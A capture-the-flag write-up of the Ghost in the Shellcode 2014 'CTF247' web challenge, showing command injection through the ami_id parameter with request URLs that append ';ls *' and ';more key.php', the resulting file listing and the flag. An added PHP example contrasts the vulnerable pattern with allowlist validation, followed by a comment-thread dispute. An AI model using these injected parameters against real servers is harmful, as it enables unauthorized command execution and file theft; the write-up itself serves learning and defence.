Ghost in the Shellcode 2014: Write-up CTF247

This weekend we had 46 hours of hard CTF. The organizers let you play a ‘doom-style’ game that could be decompiled and had to be pwned to complete some missions.
This task is one of two web challenges, a parody of CTF365 (lol). Going to ctf247.2014.ghostintheshellcode.com, it was pretty simple, since we noticed there was a command injection in one of the parameters (ami_id):

/ec2.php?utf8=✓&ami_id=ami-4be3d522&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server

First we are going to see what files are available:

/ec2.php?utf8=✓&ami_id=1;ls *&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server

16K -rw-r--r-- 1 0  16K Jan 19 16:24 index.html
4.0K -rw-r--r-- 1 0   86 Jan 19 15:27 key.php
4.0K -rw-r--r-- 1 0 2.5K Jan 18 21:16 ec2.php

ec2-api-tools-1.6.12.0:
total 104K
4.0K drwxr-xr-x 3 0 4.0K Jan 19 13:44 .
 36K drwxr-xr-x 2 0  36K Jan 19 13:44 bin
4.0K drwxr-xr-x 4 0 4.0K Jan 18 21:17 ..
 48K -rw-r--r-- 1 0  46K Jan 18 21:16 THIRDPARTYLICENSE.TXT
8.0K -rw-r--r-- 1 0 4.8K Jan 18 21:16 license.txt
4.0K -rw-r--r-- 1 0  539 Jan 18 21:16 notice.txt
 ... 
 ... 
 ...

So key.php has the flag, let’s dump it. I placed ami_id=2;cat%20key.php, but nothing happened (even when viewing the source code), so let’s use ‘more’:

/ec2.php?utf8=✓&ami_id=1;more%20key.php&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server

Finally we get the flag, which was hidden as a comment:

flag: 0aea26e968895efa40b563e3e8fe8f19

Done :)
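
The injection above works when a request parameter reaches a shell unvalidated. The following is an added example, not the challenge's ec2.php (whose source the write-up does not show): it sets a vulnerable string-building pattern beside an allowlist check and a shell-free process launch. The function names, the call to ec2-run-instances and the tool path are assumptions of this example.

```php
<?php
declare(strict_types=1);

// Assumed path: the listing only shows ec2-api-tools-1.6.12.0/bin; that the
// handler runs ec2-run-instances from it is an assumption of this example.
const EC2_TOOL = __DIR__ . '/ec2-api-tools-1.6.12.0/bin/ec2-run-instances';

// Vulnerable pattern (hypothetical): the parameter is pasted into a string
// that a shell parses, so "1;ls *" ends the first command and starts another.
function build_command_vulnerable(string $amiId): string
{
    return EC2_TOOL . ' ' . $amiId;
}

// Allowlist check: "ami-" plus 8 or 17 lowercase hex digits, nothing else.
// \A and \z anchor the whole string, so a trailing newline is rejected too.
function validate_ami_id(string $amiId): bool
{
    return preg_match('/\Aami-(?:[0-9a-f]{8}|[0-9a-f]{17})\z/', $amiId) === 1;
}

// Hardened handler: validate first, then start the tool from an argument
// array (PHP >= 7.4), which runs it directly with no shell in between.
function create_server(string $amiId): array
{
    if (!validate_ami_id($amiId)) {
        return ['ok' => false, 'output' => 'invalid ami_id'];
    }
    $proc = @proc_open([EC2_TOOL, $amiId], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return ['ok' => false, 'output' => 'could not start tool'];
    }
    $out = (string) stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    // Tool output is escaped because it is echoed back into an HTML page.
    return ['ok' => proc_close($proc) === 0, 'output' => htmlspecialchars($out)];
}

// Values taken from the requests in the write-up.
foreach (['ami-4be3d522', '1;ls *', '1;more key.php'] as $value) {
    printf("%-16s shell string: %s\n", $value, build_command_vulnerable($value));
    printf("%-16s accepted by allowlist: %s\n", $value, validate_ami_id($value) ? 'yes' : 'no');
}
```

The demo loop only prints the strings and the validation result; create_server() is not called, so nothing is executed.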


8 comments

  1. Glad you guys had such fun. Keep up the good work. Any questions, just ask.

    • tunelko

      Hey! I would like to be part of your site, but, as we talked on Twitter months ago, it was not possible. The real fun was at the GhostIntheShellCode2014 CTF.
      I hope you enjoyed it too; did you participate?
      Regards.

      • No, I haven’t participated. Regarding our Alpha/Beta stage, Alpha is a very young stage and we have very limited slots for it. In Alpha we try to find our bugs/vulnerabilities, see how users interact and how useful it would be for the ITC community with a focus on infosec, sysadmins and web developers. It is not focused on learning or practice. Alpha is for testing what we have.
        We let in only security professionals trainers/teachers, infosec company representatives, web development company representatives or companies that have Red/Blue Team departments.

        You can read more about Alpha here: http://blog.ctf365.com/ctf365-alpha-stage-started/

        • tunelko

          It strikes me that you confuse this entry with your own site! Anyway, I have to say that all the CTFs I’ve been playing were designed to train/practice people in a wide range of infosec categories, I don’t know any that didn’t have this feature. And obviously you don’t know who is playing every time in other CTFs: from professionals to talented students. You should not assume that others are not professionals (web developers, teachers, … )
          Why don’t you join and try (after your Alpha/Beta stage development)? Sure you can see the differences and learn a lot.
          Regards,
          tunelko.

          • It has this feature (training/learning). What I told you is that, being in Alpha, we’re focused on the platform to improve it. The teams already hack each other, getting points, badges and ranks. Also, bearing in mind that we host all the VM infrastructure, there is not a lot of room for everyone. I wish we had the logistics and were able to let everybody play. This is the only reason why for now we let in just this kind of professional. Moreover, we also let students try it/play with it. The only condition for students is that their teacher has to make a request.

            And no, I don’t confuse it with my own site, I just want to give you as much information as possible when you ask. And yes, we also let in teachers, web developers,… . It is written right in the blog entry above.

            Cheers,

            Marius

          • tunelko

            Sorry man, this is your first comment on the writeup post of the GhostInTheShellCode2014 web task:
            «Glad you guys had such fun. Keep up the good work. Any questions, just ask.»
            Does CTF247 have anything to do with your site CTF365 (except the author’s joke :) )? Nothing! So, OK, spam your platform here, no problem, surely there’s a person interested in it. But not me.
            Thanks :)

            PS: thread closed

  2. Dax Earl

    Nice write up! Your first one should be «/ec2.php?utf8=%E2%9C%93&ami_id=1;ls%20*&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server» though.

    • tunelko

      Thanks! Yes, the first ec2.php parameter request was only to show the original :)
      Regards!
